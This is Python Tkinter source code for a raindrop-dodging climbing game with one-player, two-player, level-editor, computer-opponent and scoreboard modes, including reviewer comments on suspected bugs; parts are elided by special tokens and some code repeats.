                        data.player1X + data.r):
                    data.Invincible1 = True
                    data.start1 = data.player1Y
                    data.invincible.remove(powerUp)
            if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.
                    player2Y + data.r):
                if (powerUp.x >= data.player2X - data.r and powerUp.x <=
                        data.player2X + data.r):
                    data.Invincible2 = True
                    data.start2 = data.player2Y
                    data.invincible.remove(powerUp)


class ScaryBug(object):
    """A spider hazard that climbs up from the bottom, switching lanes."""

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.speed = 25  # climb speed in pixels per tick

    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.spider)

    def onTimerFired(self, data):
        if data.mode == '2Player' or data.mode == 'AI':
            self.speed = 35  # bugs climb faster in head-to-head modes
        self.y -= self.speed
        # NOTE(review): `or` binds looser than `and`, so this is
        # '1Player' OR ('levelCreated' AND time % 8 == 0) — i.e. in 1Player
        # mode the lane switch happens every tick. Confirm that is intended.
        if (data.mode == '1Player' or data.mode == 'levelCreated' and data.
                time % 8 == 0):
            side = random.choice(data.sides)
            if side == 'l':
                if self.x - data.lane >= data.Player1Min:
                    self.x -= data.lane
                else:
                    self.x += data.lane
            elif side == 'r':
                if self.x + data.lane <= data.Player1Max:
                    self.x += data.lane
                else:
                    self.x -= data.lane


<|reserved_special_token_0|>


def drawPowerups(canvas, data):
    """Draw every active bug, hourglass, and umbrella."""
    for bug in data.scaryBug:
        bug.draw(canvas, data)
    for powerUp in data.powerUps:
        powerUp.draw(canvas, data)
    for powerUp in data.invincible:
        powerUp.draw(canvas, data)


def drawHome(canvas, data):
    """Draw the home button at its fixed position."""
    canvas.create_image(data.homeX, data.homeY, image=data.home)


<|reserved_special_token_0|>


def powerUpCoconutShot(data):
    """Spawn power-ups and bugs on a fixed schedule keyed off data.time."""
    if data.time % 60 == 0 and data.time % 120 != 0:
        Position = random.choice(data.spotList)
        data.powerUps.append(PowerUps(Position, 0))
    if data.time % 50 == 0:
        Position = random.choice(data.spotList)
        data.invincible.append(Invincible(Position, 0))
    if data.time % 100 == 0:
        Position = random.choice(data.spotList)
        data.scaryBug.append(ScaryBug(Position, 750))


<|reserved_special_token_0|>


def madeIt(canvas, data):
    """Draw the single-player win screen with score and name-entry box."""
    canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
    canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width / 2, 70, text='You Made it!', font=
        'Arial 23 bold', fill='yellow')
    canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,
        font='Arial 15 bold', fill='yellow')
    canvas.create_text(data.width / 2, 375, text=
        'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')
    # Name-entry box; data.name echoes what the player has typed so far.
    canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50,
        450, fill='white')
    canvas.create_text(data.width / 2, 425, text=data.name)


def drop2Player(data):
    """Spawn mirrored raindrops for both halves of the two-player screen."""
    if data.winner == None and data.pauseDrops == False:
        if data.time % 15 == 0:
            xPosition1 = random.randint(0, 385)
            # Keep random drops away from the two fixed lanes (~100 and ~360).
            if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:
                if data.pause1Drop != True:
                    data.coconuts1.append(Coconuts(xPosition1, 0))
                if data.pause2Drop != True:
                    # +410 mirrors the drop into player 2's half.
                    data.coconuts2.append(Coconuts(xPosition1 + 410, 0))
        if data.time % 12 == 0:
            side = random.choice(data.sides)
            if side == 'l':
                if data.pause1Drop != True:
                    data.coconuts1.append(Coconuts(140, 0))
                if data.pause2Drop != True:
                    data.coconuts2.append(Coconuts(540, 0))
            elif side == 'r':
                if data.pause1Drop != True:
                    data.coconuts1.append(Coconuts(344, 0))
                if data.pause2Drop != True:
                    data.coconuts2.append(Coconuts(755, 0))
        powerupDrop2Player(data)


def powerupDrop2Player(data):
    """Spawn mirrored power-ups and bugs for two-player mode on timed intervals."""
    if data.time % 45 == 0 and data.time % 90 != 0:
        side = random.choice(data.sides)
        if side == 'l':
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(140, 0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(540, 0))
        elif side == 'r':
            if data.pause1Drop != True:
                data.powerUps.append(PowerUps(344, 0))
            if data.pause2Drop != True:
                data.powerUps.append(PowerUps(755, 0))
    if data.time % 60 == 0:
        side = random.choice(data.sides)
        if side == 'l':
            if data.pause1Drop != True:
                data.invincible.append(Invincible(140, 0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(540, 0))
        elif side == 'r':
            if data.pause1Drop != True:
                data.invincible.append(Invincible(344, 0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(755, 0))
    if data.time % 90 == 0:
        side = random.choice(data.sides)
        if side == 'l':
            data.scaryBug.append(ScaryBug(140, 750))
            data.scaryBug.append(ScaryBug(540, 750))
        elif side == 'r':
            data.scaryBug.append(ScaryBug(344, 750))
            data.scaryBug.append(ScaryBug(755, 750))


<|reserved_special_token_0|>


def twoPlayerMousePressed(event, data):
    """Only the home button is clickable during a two-player game."""
    checkHome(event, data)


def twoPlayerTimerFired(data):
    """Advance both players, spawn drops, detect a winner, and update power-ups."""
    if data.winner == None:
        data.player1Y -= data.speed
        if data.player1Y < 15 and data.player2Y > 15:
            data.winner = 'player1'
        if data.player1Y > 40:
            data.time += 1
            drop2Player(data)
        data.player2Y -= data.speed
        if data.player2Y < 15 and data.player1Y > 15:
            data.winner = 'player2'
        if data.player2Y > 40:
            data.time += 1
            drop2Player(data)
        if data.player1Y < 15 and data.player2Y < 15:
            data.winner = 'tie'
        for powerUp in data.powerUps:
            powerUp.onTimerFired(data)
            hitPause(data)
        for powerUp in data.invincible:
            powerUp.onTimerFired(data)
            hitInvincible(data)
        for bug in data.scaryBug:
            bug.onTimerFired(data)
            hitScaryBug(data)
        powerupTimerFired(data)


<|reserved_special_token_0|>


def winner(canvas, data):
    """Draw the two-player result screen for player1 / player2 / tie."""
    if data.winner == 'player1':
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text=
            'You Made it! Player 1', font='Arial 23 bold', fill='yellow')
    elif data.winner == 'player2':
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text=
            'You Made it! Player 2', font='Arial 23 bold', fill='yellow')
    elif data.winner == 'tie':
        canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
        canvas.create_image(data.width / 2, data.height / 2, image=data.
            winScreen)
        canvas.create_image(300, 320, image=data.winBug)
        canvas.create_text(data.width / 2, 100, text=
            'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')


def editorKeyPressed(event, data):
    """'r' restarts the whole app from the editor screen."""
    if event.keysym == 'r':
        init(data)


def editorMousePressed(event, data):
    """Handle clicks on the editor's speed row, then delegate to other rows."""
    checkHome(event, data)
    if data.easyY - data.r <= event.y <= data.easyY + data.r:
        if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
            data.yourSpeed = 'slow'
            data.slow = data.click
            data.medium, data.fast = data.notClick, data.notClick
        if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
            data.yourSpeed = 'medium'
            data.medium = data.click
            data.slow, data.fast = data.notClick, data.notClick
        if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
            data.yourSpeed = 'fast'
            data.fast = data.click
            data.slow, data.medium = data.notClick, data.notClick
    checkMiddle(event, data)
    checkLast(event, data)


def checkMiddle(event, data):
    """Handle clicks on the editor's rain-speed row."""
    # NOTE(review): event.y is compared against data.medX (400), an
    # x-constant — presumably it doubles as this row's y-position; verify.
    if data.medX - data.r <= event.y <= data.medX + data.r:
        if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
            data.rainSpeed = 'drizzle'
            data.drizzle = data.click
            data.rain, data.thunderstorm = data.notClick, data.notClick
        if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
            data.rainSpeed = 'rain'
            data.rain = data.click
            data.drizzle, data.thunderstorm = data.notClick, data.notClick
        if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
            data.rainSpeed = 'thunderstorm'
            data.thunderstorm = data.click
            data.drizzle, data.rain = data.notClick, data.notClick


<|reserved_special_token_0|>


def changeEnter(canvas, data):
    """Light up and draw the Enter button once all three options are chosen."""
    if (data.powerUpsEditor != None and data.yourSpeed != None and data.
            rainSpeed != None):
        data.enter = data.click
    canvas.create_image(data.medX, data.enterX, image=data.enter)
    canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)


def editorTimerFired(data):
    """Animate the editor screen's background rain."""
    data.editorTime += 1
    if data.editorTime % 2 == 0:
        rainDrop(data)
    for drop in data.editorDrops:
        drop.onTimerFired(data)


def rainDrop(data):
    """Spawn one decorative background raindrop at a random x."""
    xPosition = random.randint(0, data.width)
    data.editorDrops.append(Coconuts(xPosition, 0))


<|reserved_special_token_0|>


def setEverything(data):
    """Translate the editor's selections into numeric speed settings."""
    if data.yourSpeed == 'slow':
        data.speed = 6
    elif data.yourSpeed == 'medium':
        data.speed = 10
    elif data.yourSpeed == 'fast':
        data.speed = 14
    # rSpeed is a spawn interval: smaller means more frequent rain.
    if data.rainSpeed == 'thunderstorm':
        data.rSpeed = 7
    elif data.rainSpeed == 'rain':
        data.rSpeed = 10
    elif data.rainSpeed == 'drizzle':
        data.rSpeed = 13


<|reserved_special_token_0|>


def levelPowerUp(data):
    """Spawn power-ups/bugs for a created level, only if the editor enabled them."""
    if data.powerUpsEditor == True:
        if data.time % 20 == 0 and data.time % 40 != 0:
            Position = random.choice(data.spotList)
            data.powerUps.append(PowerUps(Position, 0))
        if data.time % 30 == 0:
            Position = random.choice(data.spotList)
            data.invincible.append(Invincible(Position, 0))
        if data.time % 35 == 0:
            Position = random.choice(data.spotList)
            data.scaryBug.append(ScaryBug(Position, 750))


<|reserved_special_token_0|>


def levelCreatedMousePressed(event, data):
    """Only the home button is clickable while playing a created level."""
    checkHome(event, data)


def levelCreatedTimerFired(data):
    """Run one tick of a player-created level: climb, spawn, collide, expire power-ups."""
    setEverything(data)
    if data.levelEditorLives > 0:
        data.cy -= data.speed
        if data.cy < 15:
            data.level += 1
        if data.cy > 40:
            data.time += 1
            if data.pauseDrops != True:
                levelCoconutShot(data)
        if data.powerUpsEditor == False:
            for coconut in data.coconuts:
                coconut.onTimerFired(data)
                hit(data)
        if data.powerUpsEditor == True:
            for powerUp in data.powerUps:
                powerUp.onTimerFired(data)
                hitPause(data)
            for powerUp in data.invincible:
                powerUp.onTimerFired(data)
                hitInvincible(data)
            for bug in data.scaryBug:
                bug.onTimerFired(data)
                hitScaryBug(data)
            for coconut in data.coconuts:
                if data.pauseDrops == False:
                    coconut.onTimerFired(data)
                    if data.beInvincible == False:
                        hit(data)
        # Power-up effects wear off after the player climbs 120 pixels.
        if data.start != None:
            if abs(data.start - data.cy) >= 120:
                data.pauseDrops, data.beInvincible = False, False


<|reserved_special_token_0|>


def winEditor(canvas, data):
    """Draw the win screen for a completed player-created level."""
    canvas.create_rectangle(0, 0, data.width, data.height, fill='black')
    canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width / 2, 100, text='You Made it!', font=
        'Arial 23 bold', fill='yellow')


<|reserved_special_token_0|>


def difficultyMousePressed(event, data):
    """Handle clicks on the AI difficulty buttons and the Enter button."""
    checkHome(event, data)
    if data.easyY - data.r <= event.y <= data.easyY + data.r:
        if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
            data.difficulty = data.difS
            data.slow = data.click
            data.medium, data.fast = data.notClick, data.notClick
        if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
            data.difficulty = data.difM
            data.medium = data.click
            data.slow, data.fast = data.notClick, data.notClick
        if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
            data.difficulty = data.difH
            data.fast = data.click
            data.slow, data.medium = data.notClick, data.notClick
    # Enter is only active (data.click image) once a difficulty was chosen.
    if data.enter == data.click:
        if data.enterY - data.r <= event.y <= data.enterY + data.r:
            if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
                data.mode = 'AI'


def difficultyTimerFired(data):
    """Animate the difficulty screen's background rain."""
    data.editorTime += 1
    if data.editorTime % 2 == 0:
        rainDrop(data)
    for drop in data.editorDrops:
        drop.onTimerFired(data)


def rainDrop(data):
    # NOTE(review): duplicate definition — shadows the identical rainDrop
    # defined earlier in this file; one of the two can be removed.
    xPosition = random.randint(0, data.width)
    data.editorDrops.append(Coconuts(xPosition, 0))


def difficultyRedrawAll(canvas, data):
    """Draw the AI difficulty-selection screen."""
    canvas.create_image(data.width / 2, data.height / 2, image=data.background)
    canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    drawDifficulties(canvas, data)
    drawHome(canvas, data)


def hitAI1(data, distance):
    """AI player: dodge incoming drops with difficulty-scaled probability, and
    take the knock-down penalty on an actual hit."""
    for coconut in data.coconutsAI1:
        if (data.player1Y - data.r - coconut.y <= distance and data.
                switchOnProgress == False):
            if (coconut.x >= data.player1X - data.r and coconut.x <= data.
                    player1X + data.r or AISwitchBug(data, distance) == True):
                # Roll 0-9; dodge when at or below the difficulty threshold.
                testInt = random.randint(0, 9)
                if testInt <= data.difficulty:
                    # NOTE(review): switchOnProgress is set and then cleared
                    # within the same tick — confirm the flag has any effect.
                    data.switchOnProgress = True
                    if data.player1X == 150:
                        data.player1X = 340
                    else:
                        data.player1X = 150
                    data.switchOnProgress = False
        if (coconut.y >= data.player1Y - data.r and coconut.y <= data.
                player1Y + data.r):
            if (coconut.x >= data.player1X - data.r and coconut.x <= data.
                    player1X + data.r):
                data.player1Y += 50
                data.coconutsAI1.remove(coconut)


<|reserved_special_token_0|>


def hitAI2(data, distance):
    """Human player in AI mode: knock down 50px on a hit and remove the drop."""
    for coconut in data.coconutsAI2:
        if (coconut.y >= data.player2Y - data.r and coconut.y <= data.
                player2Y + data.r):
            if (coconut.x >= data.player2X - data.r and coconut.x <= data.
                    player2X + data.r):
                data.player2Y += 50
                data.coconutsAI2.remove(coconut)


def coconutShotAI(data):
    """Spawn mirrored drops for both halves of the vs-computer screen."""
    if data.winner == None:
        if data.time % 15 == 0:
            xPosition1 = random.randint(0, 385)
            if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:
                if data.pause1Drop != True:
                    data.coconutsAI1.append(Coconuts(xPosition1, 0))
                if data.pause2Drop != True:
                    data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))
        if data.time % 8 == 0:
            # Extra drops near the outer edges of each half.
            xPosition2 = random.randint(0, 80)
            xPosition3 = random.randint(364, 385)
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(xPosition2, 0))
                data.coconutsAI1.append(Coconuts(xPosition3, 0))
            if data.pause2Drop != True:
                data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))
                data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))
        addExtraCoconut(data)
        addPowerUpsAI(data)


<|reserved_special_token_0|>


def addPowerUpsAI(data):
    """Spawn mirrored umbrellas and bugs for the vs-computer mode."""
    if data.time % 33 == 0:
        side = random.choice(data.sides)
        if side == 'l':
            if data.pause1Drop != True:
                data.invincible.append(Invincible(140, 0))
            if data.pause2Drop != True:
                data.invincible.append(Invincible(550, 0))
        elif side == 'r':
            if data.pause1Drop != True:
                data.invincible.append(Invincible(344, 0))
            if data.pause2Drop != True:
data.invincible.append(Invincible(755, 0)) if data.time % 66 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(550, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(750, 750)) <|reserved_special_token_0|> def AITimerFired(data): if data.winner == None: if data.Invincible1 == False: hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False: coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.Invincible1 == False: hitAI1(data, 13) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 13) data.player1Y -= data.speedAI if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 coconutShotAI(data) data.player2Y -= data.speedAI if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) <|reserved_special_token_0|> def AIWinner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='The Computer Won :(', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! 
You Won!', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def scoreboardKeyPressed(event, data): if event.keysym == 'r': init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!', font='Arial 30 bold', fill='yellow') canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font= 'Arial 20 bold', fill='yellow') drawHome(canvas, data) data.savedScores data.savedScores = readFile('score.txt') score = data.savedScores.splitlines() scores = [] for line in score: scores.append(line.split(',')) scores = sorted(scores, key=lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width / 2, data.scoreShift + i * 50, text= top5[i], font='Arial 18 bold', fill='yellow') <|reserved_special_token_0|> def helpRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, 
data): timerFired(data) redrawAllWrapper(canvas, data) canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 root = Tk() init(data) canvas = Canvas(root, width=data.width, height=data.height) canvas.pack() root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas, data)) root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) root.mainloop() print('bye!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def init2(data): data.tbg = PhotoImage(file='tbg2.gif') data.click = PhotoImage(file='click.gif') data.notClick = PhotoImage(file='notClick.gif') data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow = data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain = data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives = 2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file='home.gif') data.helpScreen = PhotoImage(file='help1.gif') data.title = PhotoImage(file='title.gif') data.scoreList = [] data.spotList = [270, 364, 458, 552, 646, 740] data.savedScores = readFile('score.txt') if data.mode == 'levelCreated': setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 
data.p1ButtonX = 225
    data.p2ButtonX = 290
    data.edButton = 355
    data.diffButton = 425
    data.helpButton = 490
    data.sboardButton = 555
    # NOTE(review): despite the X in the names above, splashScreenButtons
    # draws with create_image(data.splashButtonY, data.p1ButtonX, ...), so
    # splashButtonY is the shared x and these are the buttons' y positions.
    data.hitPenalty = 75
    data.splashText = data.height / 2 - 20
    data.lives = 2
    data.levelMax = 8
    data.lane = 94
    data.Player1Min = 270
    data.Player1Max = 740
    data.homeX = 50
    data.homeY = 650
    initScoreBoardHelp(data)
    init1Player(data)


<|reserved_special_token_0|>


def init1Player(data):
    """Constants for single-player mode.

    Only data.buffer is set here; its exact use is elsewhere in the
    file -- presumably a pixel margin (TODO confirm at call sites).
    """
    data.buffer = 40


def initAI(data):
    """Layout and difficulty constants for the vs-computer screens.

    difS/difM/difH (4/6/8) are the dodge thresholds the difficulty menu
    assigns to data.difficulty; the rest are widget coordinates.
    """
    data.AITY = 225
    data.easyX = 200
    data.easyY = 300
    data.medX = 400
    data.hardX = 600
    data.enterY = 450
    data.difS = 4
    data.difM = 6
    data.difH = 8
    data.last = 500
    data.enterX = 575
    data.PUT = 450
    data.RST = 350
    data.YST = 250


def mousePressed(event, data):
    """Top-level mouse dispatcher: route the click to the handler for
    the current data.mode."""
    if data.mode == 'splashScreen':
        splashScreenMousePressed(event, data)
    elif data.mode == '1Player':
        playerMousePressed(event, data)
    elif data.mode == '2Player':
        twoPlayerMousePressed(event, data)
    elif data.mode == 'editor':
        editorMousePressed(event, data)
    elif data.mode == 'levelCreated':
        levelCreatedMousePressed(event, data)
    elif data.mode == 'AI':
        AIMousePressed(event, data)
    elif data.mode == 'difficulty':
        difficultyMousePressed(event, data)
    elif data.mode == 'scoreboard':
        scoreboardMousePressed(event, data)
    elif data.mode == 'help':
        helpMousePressed(event, data)


<|reserved_special_token_0|>


def timerFired(data):
    """Top-level timer dispatcher: advance whichever screen data.mode
    currently selects."""
    if data.mode == 'splashScreen':
        splashScreenTimerFired(data)
    elif data.mode == '1Player':
        playerTimerFired(data)
    elif data.mode == '2Player':
        twoPlayerTimerFired(data)
    elif data.mode == 'editor':
        editorTimerFired(data)
    elif data.mode == 'levelCreated':
        levelCreatedTimerFired(data)
    elif data.mode == 'AI':
        AITimerFired(data)
    elif data.mode == 'difficulty':
        difficultyTimerFired(data)
    elif data.mode == 'scoreboard':
        scoreboardTimerFired(data)
    elif data.mode == 'help':
        helpTimerFired(data)


def redrawAll(canvas, data):
    """Top-level draw dispatcher: redraw the screen for the current
    data.mode."""
    if data.mode == 'splashScreen':
        splashScreenRedrawAll(canvas, data)
    elif data.mode == '1Player':
        playerRedrawAll(canvas, data)
    elif data.mode == '2Player':
twoPlayerRedrawAll(canvas, data) elif data.mode == 'editor': editorRedrawAll(canvas, data) elif data.mode == 'levelCreated': levelCreatedRedrawAll(canvas, data) elif data.mode == 'AI': AIRedrawAll(canvas, data) elif data.mode == 'difficulty': difficultyRedrawAll(canvas, data) elif data.mode == 'scoreboard': scoreboardRedrawAll(canvas, data) elif data.mode == 'help': helpRedrawAll(canvas, data) <|reserved_special_token_0|> def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime % 2 == 1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1) canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2) canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3) canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4) canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5) canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6 ) def rainDropSplash(data): xPosition = random.randint(0, 800) data.splashScreenDrops.append(Coconuts(xPosition, 0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.splashText - 10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.splashText, text= """ 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) 
Scoreboard """ , font='Arial 14 bold', fill='yellow') splashScreenButtons(canvas, data) def writeFile(path, contents): with open(path, 'wt') as f: f.write(contents) def readFile(path): with open(path, 'rt') as f: return f.read() class Coconuts(object): def __init__(self, x, y): self.x = x self.y = y self.r = 9 self.fill = 'deep sky blue' self.speed = 30 self.outline = 'blue' def draw(self, canvas): canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r, self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill= self.fill, outline=self.outline, width=3) def onTimerFired(self, data): self.y += self.speed def hit(data): for coconut in data.coconuts: if data.mode == '1Player' or data.mode == 'levelCreated': if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r: if (coconut.x >= data.cx - data.r and coconut.x <= data.cx + data.r): data.cy += data.hitPenalty if data.mode == 'levelCreated': data.lives -= 1 elif data.hit == False and data.level < data.levelMax: data.score -= data.level data.coconuts.remove(coconut) if data.mode == 'levelCreated': data.levelEditorLives -= 1 def hit2Player(data): if data.mode == '2Player': if data.Invincible1 == False: for coconut in data.coconuts1: if (coconut.y >= data.player1Y - data.r and coconut.y <= data.player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data.player1X + data.r): data.player1Y += data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: for coconut in data.coconuts2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data.player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data.player2X + data.r): data.player2Y += data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): for powerUp in data.powerUps: if data.mode == '1Player' or data.mode == 
'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.pause2Drop = True data.start2 = data.player2Y data.powerUps.remove(powerUp) class Invincible(PowerUps): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.umbrella) def hitInvincible(data): for powerUp in data.invincible: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.beInvincible = True data.start = data.cy data.invincible.remove(powerUp) if data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.Invincible1 = True data.start1 = data.player1Y data.invincible.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. 
player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.Invincible2 = True data.start2 = data.player2Y data.invincible.remove(powerUp) class ScaryBug(object): def __init__(self, x, y): self.x = x self.y = y self.speed = 25 def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.spider) def onTimerFired(self, data): if data.mode == '2Player' or data.mode == 'AI': self.speed = 35 self.y -= self.speed if (data.mode == '1Player' or data.mode == 'levelCreated' and data. time % 8 == 0): side = random.choice(data.sides) if side == 'l': if self.x - data.lane >= data.Player1Min: self.x -= data.lane else: self.x += data.lane elif side == 'r': if self.x + data.lane <= data.Player1Max: self.x += data.lane else: self.x -= data.lane def hitScaryBug(data): for bug in data.scaryBug: if data.mode == '1Player' or data.mode == 'levelCreated': if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 * data.r): if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + 1.5 * data.r): data.hit = True data.lives = 0 data.levelEditorLives = 0 if data.mode == '2Player' or data.mode == 'AI': if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y + data.r): if (bug.x >= data.player1X 